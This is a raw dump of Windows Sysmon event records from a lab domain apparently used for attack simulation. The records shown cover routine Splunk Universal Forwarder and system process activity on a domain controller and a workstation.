07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.634{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.564{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB10CF6A46D72EBED293B38ECD1AB7C,SHA256=1C20E5B035DC38080B46021F8A1B113B3ECC002F8D4598FE2051995008414F0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:52.241{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A8A1525016DF6A1185E82FC35814171,SHA256=46FB6EECFA4B027445F6D79EF0EC56C3FDF9451171820CB8E14E1C7DD9A5B145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.333{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35798E96A423142F9BC2AB053AC74EE1,SHA256=5C1E958B4EB8F4B21197E7F264A863DACC34DA5526353BE26CD3D6B2F0167A9C,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001047898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:52.048{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.048{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.032{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.033{466BC892-F420-60EB-187D-00000000CF01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C27A66AA804812337652AA30E4BAC983,SHA256=C420D3E2825BABB6A87F0255B39081934C11C316456F0CBE339A92075016A566,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F68937F6A2317FDB195629E3D9D442D,SHA256=5167DF441F2E07E610FC63DE36ADD090E38B6B7F5F2C6855262AC6B133675BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:53.241{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E82F1AD4A3B5B269D45C1CB300EE52,SHA256=1C70FD42CC48101C9D88B56302063ADB41EDB904C940DDA2854A22F473480850,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.500{466BC892-F421-60EB-1A7D-00000000CF01}74008732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:53.332{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.332{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:53.316{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:53.316{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.317{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.617{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD48A3D7A4C77D774776D6350D4CD8E3,SHA256=88191969DD3553E991DEE69177B5EF63D158F13CF672A917B5073FEA04A67BD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:54.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D56B774597C35228B213E821B601AB19,SHA256=E3E918FAFD5A35662391CD2723E15EDAAA26040001C177FB3CFC7AC4A6DC2EF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 